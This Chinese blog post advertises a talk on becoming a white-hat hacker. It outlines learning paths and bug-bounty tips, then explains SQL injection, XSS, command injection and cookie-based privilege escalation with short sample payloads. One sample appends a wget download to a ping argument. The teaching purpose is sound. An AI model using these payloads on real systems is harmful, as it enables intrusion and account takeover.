长短短 的 Live —— 如何成为白帽黑客-安全盒子
这次我要讲的是如何成为白帽黑客。
有很多事情可以使一个人发狂,尤其是缺乏学习所需的坚决与目标感,所以我会先讲砖为什么搬为什么不搬,是沾满民脂的红砖更适合搬还是混凝土小型空心的砌砖。

工欲善其事必先利其器,这是大家经常能看见的一句话。在当今互联网下,想要更好地撂倒对手,我们需要更可怕的武器「一口箱子」,箱子里的武器不见可以组成任何一件兵器,用来对敌,但更重要的还是提着箱子的你。

我知道国内外都有十四五岁的小白帽通过「漏洞奖励计划」获得过数万奖金,但奖金不是最重要的,最重要的是,这种实践方式可以让我们更快地找到自己的方式,或者说找到自己。每个人的性格天赋又都是独一无二的,因此找到真实的自己就等于找到了用的人最少的「 Hack mind 」。

关于我

我是长短短,目前在 PKAV Team 主导分布式漏洞扫描器的开发,从事了 5 年的 Web 安全研究,接触网络安全已经快十年了,为《 HTML5 规范》做过一些贡献,对浏览器及 Web 前端安全有深入的研究 ,获得过 Google / Adobe / Apple 的「安全更新致谢」,《 HTML5 Security Cheatsheet 》的编写人之一, 发布过目前世界最强大的 XSS 攻击技术思维脑图( git.io/vPpcM ) ,当然也懂点渗透。

这次 Live 主要包括下面这些问题:

1、如何选择适合自己的白帽技能学习路线?

1.1:互联网安全

1.2:移动安全:

1.3:物联网安全

1.4:客户端安全

2、如何让自己的 Skill 更匹配安全方向工作?

2.1:安全开发

2.2:安全运维工程师

2.3:安全工程师

3、如何打造属于自己的「一口箱子」?

3.1:渗透测试

3.2:漏洞挖掘

3.3:大数据安全

4、如何利用互联网厂商「漏洞奖励计划」边学习边赚钱?

4.1:如何选择靠谱的厂商/平台

4.2:如何选择相匹配的目标

4.3:如何与厂商/平台NPC有效沟通

4.4:如何提交漏洞更容易被认同

Live 时间:2016/12/29 21:00
Live 入口知乎 Live - 如何成为白帽黑客
我的 Live,你不喜欢,答卷再说:

试 卷

姓名________ 学号________

首先我们来看这个,试卷的名字和编号填写,这个部分有“漏洞”吗?

学生的姓名和编号都写在这儿,没有做任何保护措施,因此,你只要偷看了某人的试卷上的这部分内容,然后把你的试卷的上的姓名和考生编码写成和他一样的即可伪装出他的身份。

漏洞攻击成功

一、诗歌补写

1 床前没月光,___________。

2 春眠不觉晓,___________。

这道题有漏洞吗?

这道题的答案本来应该是“疑似地上霜”和“处处闻啼鸟”

But,问题中,并没有规定答案里不能添加标点符号,所以,我完全可以把“疑是地上霜,举头望明月,低头思故乡”以及“处处闻啼鸟,夜来风雨声,花落知多少”当做答案写进去。

漏洞再次进攻成功 :P

二、数学运算(在括号内填入数字)

3 500 + 400 * 3 / 2 + 1 = ( )

4 ( 1 + 2 ) / 3 * 400 +500 = ( )

这个问题有漏洞吗?

出题者规定了只能填入数字,但却没有说是什么数字,也没有规定多少位,那么我的答案可以是 中文数字「壹佰壹拾圆」、罗马数字「MCI」或「0000000000001101」。

漏洞第三次进攻成功 :D

三、技术实践

我们打开一个网页提交登录或者是搜索都会经过服务器做一系列的处理又回到浏览器,在这个过程中我们提交的数据会被带入到一系列的填空题中,有的是我们能猜到的,有的是意想不到的,有的会经过SQL进行查询进行填空,有的会被带入到命令行中进行填空,最后又把结果返回给浏览器进行填空,也最后就是我们到的结果了。

  • 用户登录 SQL 注入填空
    • Q:select * from username = ____ and password=_____
    • A:select * from username = "test" or ""="" and password="123456"
    • 解释:所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
  • 用户名 XSS 注入填空
    • Q:<p style='color:red'>你好啊,尊敬的______<p>
    • A:<p style='color:red'>你好啊,尊敬的 xxx<script>alert(1)</script><p>
    • 解释:攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
  • 远程命令注入填空
    • Q:ping _______
    • A:ping www.baidu.com & wget xxxxxxxxxxx
    • 解释:用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致执行命令。
  • Cookie 身份越权测试
    • Cookie: uid=11426;
    • Cookie: uid=1;
    • 解释:越权漏洞是比较常见的漏洞类型,可以理解为,一个正常的用户A通常只能够对自己的一些信息进行增删改查,但是由于程序员的一时疏忽未对信息进行增删改查的时候没有进行一个判断,判断所需要操作的信息是否属于对应的用户,可以导致用户A可以操作其他人的信息。

了解了这几个漏洞之后我们可以看到原理都类似,也很简单,当然我们不再局限于概念名词就会发现 web 安全的大部分漏洞都很简单。更多时候,发现一个复杂的漏洞需要是只是耐心。